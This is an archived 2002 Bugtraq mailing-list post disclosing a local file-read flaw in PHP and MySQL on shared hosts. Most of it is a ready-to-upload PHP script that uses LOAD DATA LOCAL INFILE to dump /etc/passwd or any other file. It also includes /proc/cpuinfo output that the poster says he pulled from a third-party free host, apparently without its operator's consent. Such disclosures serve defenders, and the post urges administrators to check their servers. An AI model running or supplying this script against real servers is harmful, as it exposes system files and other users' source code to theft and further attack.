File reading vulnerable in PHP and MySQL (Local Exploit)
From: Hai Nam Luke (hainamluke@hotmail.com)
Date: 11/26/02
- Previous message: Dave Aitel: "Re: Netscape Problems."
- Next in thread: Dave Wilson: "Re: File reading vulnerable in PHP and MySQL (Local Exploit)"
- Reply: Dave Wilson: "Re: File reading vulnerable in PHP and MySQL (Local Exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 26 Nov 2002 10:57:52 -0000 From: Hai Nam Luke <hainamluke@hotmail.com> To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
Attacker can use PHP and mySQL to read some local file following this way:
# Create a database (mySQL) and upload this file to your server
PHP Code: viewfile.php (programmed by Luke)
======================================================
<?
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd"; // filename that you wanna view
// shell code
echo "<pre>";
mysql_connect ($dbhost, $dbuser,
$dbpasswd);
$sql = array (
"USE $dbname",
'CREATE TEMPORARY TABLE ' . ($tbl
= 'A'.time
()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO
TABLE
$tbl FIELDS "
. "TERMINATED BY
'__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY
'__THIS_NEVER_HAPPENS__'",
"SELECT a FROM $tbl LIMIT 1"
);
foreach ($sql as $statement) {
$query = mysql_query ($statement);
if ($query == false) die (
"FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n"
);
if (! $r = @mysql_fetch_array ($query,
MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($query);
}
echo "</pre>";
?>
======================================================
You'll recived all source of /etc/passwd
This vulnerable is very dangerous because user can read some important
file in your server. Especially, at any free host, user can use local
exploit to read source code of other user and attack one another.
Example: I uploaded this file and config it at http://members.lycos.co.uk/
and I
was recived their file: "/proc/cpuinfo" :
==============================================================
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 8
model name : Pentium III (Coppermine)
stepping : 10
cpu MHz : 997.531
cache size : 256 KB
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 2
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca
cmov pat pse36
mmx fxsr sse
bogomips : 1992.29
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 8
model name : Pentium III (Coppermine)
stepping : 10
cpu MHz : 997.531
cache size : 256 KB
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 2
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca
cmov pat pse36
mmx fxsr sse
bogomips : 1992.29
==============================================================
And many another files, please check your server !
Thank to dodo. Sorry for my poor English !
Luke (HVA)
http://www.hackervn.net
- Next message: Frog Man: "FreeNews & News Evolution (PHP)"
- Previous message: Dave Aitel: "Re: Netscape Problems."
- Next in thread: Dave Wilson: "Re: File reading vulnerable in PHP and MySQL (Local Exploit)"
- Reply: Dave Wilson: "Re: File reading vulnerable in PHP and MySQL (Local Exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
